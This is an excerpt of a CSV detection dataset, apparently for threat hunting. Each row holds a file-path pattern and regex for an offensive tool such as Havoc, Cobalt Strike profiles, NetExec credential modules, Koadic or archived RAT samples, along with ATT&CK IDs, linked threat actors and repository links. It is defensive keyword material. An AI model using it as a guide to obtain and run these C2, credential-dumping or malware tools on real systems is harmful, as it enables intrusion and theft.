"*/hadoop-tasktracker-info.nse*",".{0,1000}\/hadoop\-tasktracker\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7712"
"*/Hak5.sh*",".{0,1000}\/Hak5\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","#linux","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","7713"
"*/hak5/cc-server/database.Log*",".{0,1000}\/hak5\/cc\-server\/database\.Log.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#linux","N/A","10","9","N/A","N/A","N/A","N/A","7714"
"*/HAKOPS Binder.exe*",".{0,1000}\/HAKOPS\sBinder\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7715"
"*/HAKOPS RAT.exe*",".{0,1000}\/HAKOPS\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7716"
"*/hakrawler.git*",".{0,1000}\/hakrawler\.git.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/hakluke/hakrawler","1","1","#linux","N/A","6","10","4683","520","2024-12-21T20:40:03Z","2019-12-15T13:54:43Z","7717"
"*/hancitor.profile*",".{0,1000}\/hancitor\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","7718"
"*/HandleHijacker.cpp*",".{0,1000}\/HandleHijacker\.cpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","7719"
"*/HandleHijacker.hpp*",".{0,1000}\/HandleHijacker\.hpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","7720"
"*/handlekatz.py*",".{0,1000}\/handlekatz\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","7721"
"*/HandleKatz_BOF*",".{0,1000}\/HandleKatz_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/HandleKatz_BOF","1","1","N/A","N/A","10","10","96","18","2021-10-12T21:38:02Z","2021-10-12T18:45:06Z","7722"
"*/Harmmy Rat v1.*.exe*",".{0,1000}\/Harmmy\sRat\sv1\..{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7723"
"*/HaryyUser.exe*",".{0,1000}\/HaryyUser\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","7724"
"*/hash_spider.py*",".{0,1000}\/hash_spider\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","7725"
"*/hashcat*",".{0,1000}\/hashcat.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7726"
"*/hashcat-rule.git*",".{0,1000}\/hashcat\-rule\.git.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","#linux","N/A","10","5","435","47","2024-09-02T20:14:15Z","2020-03-06T17:20:40Z","7727"
"*/hashcrack_com.rb*",".{0,1000}\/hashcrack_com\.rb.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","7728"
"*/hashcracking.rb*",".{0,1000}\/hashcracking\.rb.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","7729"
"*/hashdump_dc*",".{0,1000}\/hashdump_dc.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","7730"
"*/hashesorg2019.gz*",".{0,1000}\/hashesorg2019\.gz.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","7731"
"*/Hashi0x/*",".{0,1000}\/Hashi0x\/.{0,1000}","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Exploitation tool","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","1","N/A","network exploitation tool","N/A","","N/A","","","","7732"
"*/hashview.py*",".{0,1000}\/hashview\.py.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","7733"
"*/havex.profile*",".{0,1000}\/havex\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","7734"
"*/Havoc.cpp*",".{0,1000}\/Havoc\.cpp.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","7735"
"*/Havoc.qss*",".{0,1000}\/Havoc\.qss.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","7736"
"*/Havoc.rc*",".{0,1000}\/Havoc\.rc.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","7737"
"*/Havoc/data/*",".{0,1000}\/Havoc\/data\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","7738"
"*/Havoc/main/*",".{0,1000}\/Havoc\/main\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","7739"
"*/havoc_bof.py*",".{0,1000}\/havoc_bof\.py.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","7740"
"*/HavocFramework/*",".{0,1000}\/HavocFramework\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","7741"
"*/HavocImages/*",".{0,1000}\/HavocImages\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","7742"
"*/havoc-py/*",".{0,1000}\/havoc\-py\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","7743"
"*/HavRat.exe*",".{0,1000}\/HavRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7744"
"*/hbase-master-info.nse*",".{0,1000}\/hbase\-master\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7745"
"*/hbase-region-info.nse*",".{0,1000}\/hbase\-region\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7746"
"*/hddtemp-info.nse*",".{0,1000}\/hddtemp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7747"
"*/hDendron.cs*",".{0,1000}\/hDendron\.cs.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","7748"
"*/HeapCrypt.git*",".{0,1000}\/HeapCrypt\.git.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","N/A","9","3","239","44","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z","7749"
"*/HellHall.git*",".{0,1000}\/HellHall\.git.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","1","N/A","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","7750"
"*/HellsGate.git*",".{0,1000}\/HellsGate\.git.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","N/A","10","1028","121","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z","7751"
"*/HellsHall.exe*",".{0,1000}\/HellsHall\.exe.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","1","N/A","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","7752"
"*/helperFunctions/Delregkey_hkcu.txt*",".{0,1000}\/helperFunctions\/Delregkey_hkcu\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","7753"
"*/helperFunctions/Delregvalue_hkcu.txt*",".{0,1000}\/helperFunctions\/Delregvalue_hkcu\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","7754"
"*/helperFunctions/dir_creator.txt*",".{0,1000}\/helperFunctions\/dir_creator\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","7755"
"*/helperFunctions/dir_lister.txt*",".{0,1000}\/helperFunctions\/dir_lister\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","7756"
"*/helperFunctions/Getallregkeys.txt*",".{0,1000}\/helperFunctions\/Getallregkeys\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","7757"
